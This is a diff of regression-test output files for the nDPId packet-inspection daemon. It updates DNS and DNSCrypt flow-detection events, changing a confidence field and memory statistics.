00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1599686652578,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":159,"pkt_l4_len":125,"thread_ts_msec":1599686652578,"pkt":"KDc3AG3IEBMx8Tl2CABFAACR3WoAAHYRlJEICAgIwKgBqAA1\/x8AfQAAi1SBgwABAAAAAQAABmdtcjAyYwIxNgEwDGZoa2Zoc2RrZmhzawZ0dW5uZWwHZXhhbXBsZQNjb20AAAEAAcAsAAYAAQAABcMALAJucwVpY2FubgNvcmcAA25vYwNkbnPATHhn+r4AABwgAAAOEAASdQAAAA4Q"} -00814{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1599686652555,"flow_last_seen":1599686652578,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1599686652578,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"gmr02c.16.0.fhkfhsdkfhsk.tunnel.example.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1599686652555,"flow_last_seen":1599686652578,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1599686652578,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00814{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1599686652555,"flow_last_seen":1599686652578,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1599686652578,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"gmr02c.16.0.fhkfhsdkfhsk.tunnel.example.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1599686652555,"flow_last_seen":1599686652578,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1599686652578,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"dns_long_domainname.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":178,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1599686652578} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/2 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869518 bytes -~~ total memory freed........: 5869518 bytes -~~ total allocations/frees...: 118117/118117 +~~ total memory allocated....: 6003152 bytes +~~ total memory freed........: 6003152 bytes +~~ total allocations/frees...: 120879/120879 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 475 chars ~~ json string max len.......: 819 chars 
diff --git a/test/results/dnscrypt-v1-and-resolver-pings.pcap.out b/test/results/dnscrypt-v1-and-resolver-pings.pcap.out
index 70d818235..701c72b86 100644
--- a/test/results/dnscrypt-v1-and-resolver-pings.pcap.out
+++ b/test/results/dnscrypt-v1-and-resolver-pings.pcap.out
@@ -2,28 +2,28 @@ 00569{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946735705348} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946735705348,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946735705348,"pkt":"REREREREZmZmZmZmCABFAAIcCf9AAL0Rd68KAAABlTjkLZX0AbsCCDw8f0cBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946735705348,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946735705348,"pkt":"REREREREZmZmZmZmCABFAAXcCgAgAL0Rk+4KAAABlTjkLbKaAbsGBGxVf0QBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00223{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946735705348} 
00418{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946735705348,"pkt":"REREREREZmZmZmZmCABFAABQCgAAub0RuMEKAAABlTjkLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946735705348,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946735705348,"pkt":"REREREREZmZmZmZmCABFAAXcCgEgAL0Rk+0KAAABlTjkLYqnAbsGBJRGf0YBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00223{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946735705348} 
00418{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946735705348,"pkt":"REREREREZmZmZmZmCABFAABQCgEAub0RuMAKAAABlTjkLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946735705349,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946735705349,"pkt":"REREREREZmZmZmZmCABFAAIcCgJAAL0Rd6wKAAABlTjkLYMdAbsCCDw8f0UBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
